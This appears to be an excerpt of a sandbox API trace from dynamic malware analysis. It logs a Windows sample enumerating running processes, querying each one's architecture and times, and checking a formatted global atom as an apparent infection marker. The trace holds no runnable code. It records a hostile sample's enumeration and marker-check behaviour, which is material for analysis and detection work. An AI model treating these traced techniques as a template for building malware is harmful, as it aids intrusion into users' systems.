	[0097.688] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x658c68, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0097.688] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x248
	[0097.688] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.688] CloseHandle (hObject=0x248) returned 1
	[0097.688] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x658970, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0097.688] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0097.688] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.688] CloseHandle (hObject=0x248) returned 1
	[0097.688] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x64fe78, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0097.688] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0097.689] GetLastError () returned 0x5
	[0097.689] GetLastError () returned 0x5
	[0097.689] GetLastError () returned 0x5
	[0097.689] GetLastError () returned 0x5
	[0097.689] GetLastError () returned 0x5
	[0097.689] GetLastError () returned 0x5
	[0097.689] GetLastError () returned 0x5
	[0097.689] GetLastError () returned 0x5
	[0097.689] GetLastError () returned 0x5
	[0097.689] GetLastError () returned 0x5
	[0097.689] GetLastError () returned 0x5
	[0097.689] GetLastError () returned 0x5
	[0097.689] GetLastError () returned 0x5
	[0097.689] GetLastError () returned 0x5
	[0097.689] GetLastError () returned 0x5
	[0097.689] GetLastError () returned 0x5
	[0097.689] GetLastError () returned 0x5
	[0097.689] GetLastError () returned 0x5
	[0097.689] GetLastError () returned 0x5
	[0097.689] GetLastError () returned 0x5
	[0097.689] GetLastError () returned 0x5
	[0097.689] GetLastError () returned 0x5
	[0097.689] GetLastError () returned 0x5
	[0097.689] GetLastError () returned 0x5
	[0097.689] GetLastError () returned 0x5
	[0097.689] GetLastError () returned 0x5
	[0097.689] GetLastError () returned 0x5
	[0097.689] GetLastError () returned 0x5
	[0097.689] GetLastError () returned 0x5
	[0097.689] GetLastError () returned 0x5
	[0097.689] GetLastError () returned 0x5
	[0097.689] GetLastError () returned 0x5
	[0097.689] GetLastError () returned 0x5
	[0097.689] GetLastError () returned 0x5
	[0097.689] GetLastError () returned 0x5
	[0097.689] GetLastError () returned 0x5
	[0097.689] GetLastError () returned 0x5
	[0097.689] GetLastError () returned 0x5
	[0097.689] GetLastError () returned 0x5
	[0097.689] GetLastError () returned 0x5
	[0097.689] GetLastError () returned 0x5
	[0097.689] GetLastError () returned 0x5
	[0097.689] GetLastError () returned 0x5
	[0097.689] GetLastError () returned 0x5
	[0097.689] GetLastError () returned 0x5
	[0097.689] GetLastError () returned 0x5
	[0097.689] GetLastError () returned 0x5
	[0097.689] GetLastError () returned 0x5
	[0097.689] GetLastError () returned 0x5
	[0097.689] GetLastError () returned 0x5
	[0097.690] GetLastError () returned 0x5
	[0097.690] GetLastError () returned 0x5
	[0097.690] GetLastError () returned 0x5
	[0097.690] GetLastError () returned 0x5
	[0097.690] GetLastError () returned 0x5
	[0097.690] GetLastError () returned 0x5
	[0097.690] GetLastError () returned 0x5
	[0097.690] GetLastError () returned 0x5
	[0097.690] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0097.690] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0097.690] GetProcessTimes (in: hProcess=0x248, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0097.690] GetLastError () returned 0x5
	[0097.690] GetLastError () returned 0x5
	[0097.690] GetLastError () returned 0x5
	[0097.690] GetLastError () returned 0x5
	[0097.690] GetLastError () returned 0x5
	[0097.690] GetLastError () returned 0x5
	[0097.690] GetLastError () returned 0x5
	[0097.690] GetLastError () returned 0x5
	[0097.690] GetLastError () returned 0x5
	[0097.690] GetLastError () returned 0x5
	[0097.690] GetLastError () returned 0x5
	[0097.690] GetLastError () returned 0x5
	[0097.690] GetLastError () returned 0x5
	[0097.690] GetLastError () returned 0x5
	[0097.690] GetLastError () returned 0x5
	[0097.690] GetLastError () returned 0x5
	[0097.690] GetLastError () returned 0x5
	[0097.690] GetLastError () returned 0x5
	[0097.690] GetLastError () returned 0x5
	[0097.690] GetLastError () returned 0x5
	[0097.690] GetLastError () returned 0x5
	[0097.690] GetLastError () returned 0x5
	[0097.690] GetLastError () returned 0x5
	[0097.690] GetLastError () returned 0x5
	[0097.690] GetLastError () returned 0x5
	[0097.690] GetLastError () returned 0x5
	[0097.690] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0097.691] GetLastError () returned 0x5
	[0097.691] GetLastError () returned 0x5
	[0097.691] GetLastError () returned 0x5
	[0097.691] GetLastError () returned 0x5
	[0097.691] GetLastError () returned 0x5
	[0097.691] GetLastError () returned 0x5
	[0097.691] GetLastError () returned 0x5
	[0097.691] GetLastError () returned 0x5
	[0097.691] GetLastError () returned 0x5
	[0097.691] GetLastError () returned 0x5
	[0097.691] GetLastError () returned 0x5
	[0097.691] GetLastError () returned 0x5
	[0097.691] GetLastError () returned 0x5
	[0097.691] GetLastError () returned 0x5
	[0097.691] GetLastError () returned 0x5
	[0097.691] GetLastError () returned 0x5
	[0097.691] GetLastError () returned 0x5
	[0097.691] GetLastError () returned 0x5
	[0097.691] GetLastError () returned 0x5
	[0097.691] GetLastError () returned 0x5
	[0097.691] GetLastError () returned 0x5
	[0097.691] GetLastError () returned 0x5
	[0097.691] GetLastError () returned 0x5
	[0097.691] GetLastError () returned 0x5
	[0097.691] GetLastError () returned 0x5
	[0097.691] GetLastError () returned 0x5
	[0097.691] GetLastError () returned 0x5
	[0097.691] GetLastError () returned 0x5
	[0097.691] GetLastError () returned 0x5
	[0097.691] GetLastError () returned 0x5
	[0097.691] GetLastError () returned 0x5
	[0097.691] GetLastError () returned 0x5
	[0097.691] GetLastError () returned 0x5
	[0097.691] GetLastError () returned 0x5
	[0097.691] GetLastError () returned 0x5
	[0097.691] GetLastError () returned 0x5
	[0097.691] GetLastError () returned 0x5
	[0097.691] GetLastError () returned 0x5
	[0097.691] GetLastError () returned 0x5
	[0097.691] GetLastError () returned 0x5
	[0097.691] GetLastError () returned 0x5
	[0097.691] GetLastError () returned 0x5
	[0097.691] GetLastError () returned 0x5
	[0097.691] GetLastError () returned 0x5
	[0097.691] GetLastError () returned 0x5
	[0097.691] GetLastError () returned 0x5
	[0097.691] GetLastError () returned 0x5
	[0097.691] GetLastError () returned 0x5
	[0097.692] GetLastError () returned 0x5
	[0097.692] GetLastError () returned 0x5
	[0097.692] GetLastError () returned 0x5
	[0097.692] GetLastError () returned 0x5
	[0097.692] GetLastError () returned 0x5
	[0097.692] GetLastError () returned 0x5
	[0097.692] GetLastError () returned 0x5
	[0097.692] GetLastError () returned 0x5
	[0097.692] GetLastError () returned 0x5
	[0097.692] GetLastError () returned 0x5
	[0097.692] GetLastError () returned 0x5
	[0097.692] GetLastError () returned 0x5
	[0097.692] GetLastError () returned 0x5
	[0097.692] GetLastError () returned 0x5
	[0097.692] GetLastError () returned 0x5
	[0097.692] GetLastError () returned 0x5
	[0097.692] GetLastError () returned 0x5
	[0097.692] GetLastError () returned 0x5
	[0097.692] GetLastError () returned 0x5
	[0097.692] GetLastError () returned 0x5
	[0097.692] GetLastError () returned 0x5
	[0097.692] GetLastError () returned 0x5
	[0097.692] GetLastError () returned 0x5
	[0097.692] GetLastError () returned 0x5
	[0097.692] GetLastError () returned 0x5
	[0097.692] GetLastError () returned 0x5
	[0097.692] GetLastError () returned 0x5
	[0097.692] GetLastError () returned 0x5
	[0097.692] GetLastError () returned 0x5
	[0097.692] GetLastError () returned 0x5
	[0097.692] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0097.692] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0097.692] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0097.692] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0097.693] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0097.693] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0097.693] CloseHandle (hObject=0x248) returned 1
	[0097.693] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0097.693] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x64fe78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0097.693] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0097.693] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x64fd10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0097.693] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x248
	[0097.693] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.693] CloseHandle (hObject=0x248) returned 1
	[0097.693] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x65ac98, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0097.694] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x248
	[0097.694] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.694] CloseHandle (hObject=0x248) returned 1
	[0097.694] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x64fd10, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0097.743] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x286ff10 | out: SystemInformation=0x0, ResultLength=0x286ff10*=0x16728) returned 0xc0000004
	[0097.743] VirtualAlloc (lpAddress=0x0, dwSize=0x16828, flAllocationType=0x3000, flProtect=0x4) returned 0x610000
	[0097.744] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x610000, Length=0x16828, ResultLength=0x0 | out: SystemInformation=0x610000, ResultLength=0x0) returned 0x0
	[0097.745] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0097.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x64fe78, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0097.745] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0097.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x64fd10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0097.746] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0097.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.746] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0097.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x64fd28, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0097.746] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0097.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0097.746] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0097.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0097.747] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0097.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x64fd10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0097.747] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0097.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.747] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0097.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.748] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0097.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x65ad08, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0097.748] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0097.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.748] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0097.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd28, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.748] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0097.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.749] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0097.749] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.749] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0097.749] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.749] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0097.749] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.749] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0097.749] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.749] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0097.750] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.750] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x248
	[0097.750] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.750] CloseHandle (hObject=0x248) returned 1
	[0097.750] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x64fd10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0097.750] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0097.750] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe90, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.750] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0097.750] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x658e08, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0097.751] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x248
	[0097.751] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.751] CloseHandle (hObject=0x248) returned 1
	[0097.751] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x658f68, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0097.751] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0097.751] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.751] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x248
	[0097.751] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.751] CloseHandle (hObject=0x248) returned 1
	[0097.751] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x64fe78, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0097.751] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x248
	[0097.751] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.751] CloseHandle (hObject=0x248) returned 1
	[0097.752] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x64fe78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0097.752] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x248
	[0097.752] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.752] CloseHandle (hObject=0x248) returned 1
	[0097.752] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x64fd10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0097.752] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x248
	[0097.752] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.752] CloseHandle (hObject=0x248) returned 1
	[0097.752] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x658f68, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0097.752] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x248
	[0097.752] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.752] CloseHandle (hObject=0x248) returned 1
	[0097.752] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0097.753] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x248
	[0097.753] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.753] CloseHandle (hObject=0x248) returned 1
	[0097.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.753] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0097.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.753] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x248
	[0097.753] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.753] CloseHandle (hObject=0x248) returned 1
	[0097.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x64fd10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0097.753] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x248
	[0097.753] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.754] CloseHandle (hObject=0x248) returned 1
	[0097.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x248
	[0097.754] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.754] CloseHandle (hObject=0x248) returned 1
	[0097.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x6590a8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0097.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x248
	[0097.754] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.754] CloseHandle (hObject=0x248) returned 1
	[0097.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x658d48, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0097.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x248
	[0097.754] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.754] CloseHandle (hObject=0x248) returned 1
	[0097.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x65ad58, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0097.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x248
